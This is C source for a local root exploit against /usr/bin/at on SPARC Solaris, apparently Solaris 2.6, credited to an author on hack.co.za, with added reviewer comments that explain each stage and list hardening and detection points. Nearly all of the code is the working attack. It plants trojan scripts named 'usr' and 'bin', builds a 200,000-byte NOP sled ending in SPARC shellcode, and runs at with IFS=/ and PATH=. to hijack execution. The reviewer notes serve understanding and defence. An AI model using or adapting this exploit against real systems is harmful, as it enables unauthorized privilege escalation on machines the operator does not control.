/*
 * at sploit - tested on 2.6
 * by horizon - do not use
 * "I like to walk around and.. I'm paid to stand around.."
 *
 * Reviewer summary (from the visible code only): a local proof of concept
 * aimed at /usr/bin/at. It
 *   1. writes two helper shell scripts named "usr" and "bin" into the
 *      current directory,
 *   2. builds a RUNWAY-sized environment value made of a repeated filler
 *      word followed by SPARC machine code, and
 *   3. executes at(1) with a replacement environment of IFS=/, PATH=. and
 *      that oversized variable.
 * NOTE(review): "2.6" presumably means Solaris 2.6, given the SPARC payload;
 * the file does not say so explicitly.
 *
 * Defensive relevance: the technique depends on a privileged program that
 * inherits IFS/PATH from its caller and copies attacker-influenced data
 * without a bound. Set-id programs should reset IFS and PATH and bound
 * every copy; a non-executable user stack (noexec_user_stack on Solaris)
 * and auditing exec of set-id binaries with an abnormally large environment
 * or a caller-supplied IFS are the matching hardening and detection points.
 */

/* The four header names were lost when this listing was extracted; the
 * directives are left exactly as found. */
#include
#include
#include
#include

/* Size in bytes of the buffer that becomes the oversized environment value. */
#define RUNWAY 200000
/* 32-bit filler word the author labels as a SPARC no-op; used as padding
 * in front of the payload. */
#define SPARC_NOP 0xac15a16e
/* Hard-coded 32-bit address written 250 times into the helper script.
 * NOTE(review): looks like a stack address where the environment block is
 * expected to sit - not verifiable from this file. */
#define ADDR 0xefffd008

/* Opaque SPARC machine-code payload, not disassembled in this review.
 * main() measures it with strlen(), so it is treated as a NUL-terminated
 * string with no zero byte before its end. */
u_char sparc_shellcode[] =
"\x90\x08\x3f\xff\x82\x10\x20\x8d\x91\xd0\x20\x08"
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\xae\x10\x2b\xdc\xaf\x2d\xe0\x01\xae\x05\xe0\x01"
"\xaf\x2d\xe0\x01\xae\x05\xe0\x01\xaf\x2d\xe0\x01"
"\xaf\x2d\xe0\x01\xae\x05\xe0\x01\xaf\x2d\xe0\x01"
"\xae\x05\xe0\x01\xaf\x2d\xe0\x01\xaf\x2d\xe0\x01"
"\xae\x05\xe0\x01\xaf\x2d\xe0\x01\xaf\x2d\xe0\x0a"
"\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
"\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08";

/*
 * Entry point. Takes no meaningful arguments (argc/argv are unused) and
 * does not return on success, because execle() replaces the process image.
 * Side effects: creates the files "usr" and "bin" in the current directory.
 */
int main(int argc, char *argv[])
{
    char buf[RUNWAY];       /* filler words + payload; a 200000-byte stack array */
    char *holder;
    char *evec[4];          /* replacement environment handed to execle() */
    FILE * f;
    u_long *long_p;
    u_char *char_p;
    int i, code_length = strlen(sparc_shellcode);

    /* Stage 1: write a shell script named "usr" whose only command echoes
     * the four bytes of ADDR, most significant first, 250 times. The
     * fopen() result is used without a check. */
    f=fopen("usr","w");
    fprintf(f,"#!/bin/sh\n");
    fprintf(f,"echo \'");
    for (i=0;i<250;i++)
        fprintf(f,"%c%c%c%c", (ADDR>>24)&255, (ADDR>>16)&255, (ADDR>>8)&255, (ADDR)&255);
    fprintf(f,"\'\n");
    fclose(f);

    /* Duplicate the script as "bin" and make both executable. With IFS=/
     * and PATH=. set below, these names match the path components
     * "usr" and "bin".
     * NOTE(review): presumably the target hands an absolute path to a shell
     * that honours the inherited IFS, so the local script runs instead -
     * confirm against the at(1) source or the vendor advisory. */
    system("cp usr bin");
    system("chmod 755 usr bin");

    /* Stage 2: fill buf with SPARC_NOP words, leaving room at the end for
     * the payload, then append the payload bytes and a terminating NUL. */
    long_p =(u_long *) buf ;
    for (i = 0; i < (RUNWAY - code_length) / sizeof(u_long); i++)
        *long_p++ = SPARC_NOP;
    char_p = (u_char *) long_p;
    for (i = 0; i < code_length; i++)
        *char_p++ = sparc_shellcode[i];
    *char_p++ = 0;

    /* Stage 3: build the three-entry environment. malloc() results are not
     * checked. BLAH carries the whole of buf as its value. */
    holder=malloc(10);
    sprintf(holder,"IFS=/");
    evec[0]=holder;
    holder=malloc(10);
    sprintf(holder,"PATH=.");
    evec[1]=holder;
    holder=malloc(RUNWAY+20);
    sprintf(holder,"BLAH=%s",buf);
    evec[2]=holder;
    evec[3]=NULL;

    /* at(1) reads the job text from standard input, hence the prompt to
     * send end-of-file. */
    printf("Hit Ctrl-D\n");
    printf("You won't see the output of your commands so aim well.\n");

    /* Run at with "-k now" and evec as its entire environment. Control
     * reaches the closing brace only if execle() fails; there is no return
     * statement or error report for that case. */
    execle("/usr/bin/at","at","-k","now",NULL,evec);
}
/* www.hack.co.za [2000]*/